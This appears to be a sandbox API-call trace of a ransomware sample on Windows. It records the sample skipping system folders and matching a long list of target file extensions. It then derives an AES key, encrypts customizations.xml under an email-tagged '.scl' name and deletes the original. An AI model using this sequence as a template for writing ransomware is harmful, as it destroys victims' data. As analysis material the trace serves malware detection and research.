	[0173.142] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{8fb7d64e-70fc-4f9d-89ee-d486817534df}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}"
	[0173.143] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}"
	[0173.143] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\"
	[0173.143] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\"
	[0173.143] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*"
	[0173.143] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0173.149] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*") returned 84
	[0173.149] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.149] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*") returned 0x54
	[0173.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.149] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="windows") returned 0x0
	[0173.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.150] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="boot") returned 0x0
	[0173.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.151] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.151] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.151] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="temp") returned 0x0
	[0173.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.151] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="program files") returned 0x0
	[0173.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.152] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.152] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="appdata") returned 0x0
	[0173.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.152] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="application data") returned 0x0
	[0173.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="winnt") returned 0x0
	[0173.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="tmp") returned 0x0
	[0173.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="cache") returned 0x0
	[0173.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.154] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="webcache") returned 0x0
	[0173.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.154] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.154] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.155] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="packages") returned 0x0
	[0173.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.155] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="cookies") returned 0x0
	[0173.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.155] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="programdata") returned 0x0
	[0173.155] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.155] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa166c88f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa166c88f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1692b03, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x36b, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0173.156] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0173.156] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0173.156] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\"
	[0173.156] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"
	[0173.156] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned 99
	[0173.156] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.156] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned 0x63
	[0173.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.157] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.157] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"
	[0173.157] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned 99
	[0173.157] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.157] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.158] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.158] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.158] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.158] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.159] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x36b, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x36b, lpOverlapped=0x0) returned 1
	[0173.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.163] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb770) returned 1
	[0173.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.182] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0173.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.183] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.183] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.183] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9470) returned 1
	[0173.183] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.183] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x36b, dwBufLen=0x36b | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x370) returned 1
	[0173.183] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.184] RtlMoveMemory (in: Destination=0xfde188, Source=0xfdc138, Length=0x36b | out: Destination=0xfde188) 
	[0173.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.184] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde188*, pdwDataLen=0x18a1ec*=0x36b, dwBufLen=0x370 | out: pbData=0xfde188*, pdwDataLen=0x18a1ec*=0x370) returned 1
	[0173.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.185] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0173.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.185] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0173.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.185] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0173.185] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.186] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.186] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0173.187] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0173.187] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.189] WriteFile (in: hFile=0x39c, lpBuffer=0xfde188*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesWritten=0x18a648*=0x370, lpOverlapped=0x0) returned 1
	[0173.192] CloseHandle (hObject=0x39c) returned 1
	[0173.193] CloseHandle (hObject=0x390) returned 1
	[0173.194] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml")) returned 1
	[0173.197] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml")) returned 0
	[0173.198] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa166c88f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa166c88f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa166c88f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0173.198] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0173.198] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0173.198] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\"
	[0173.198] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml"
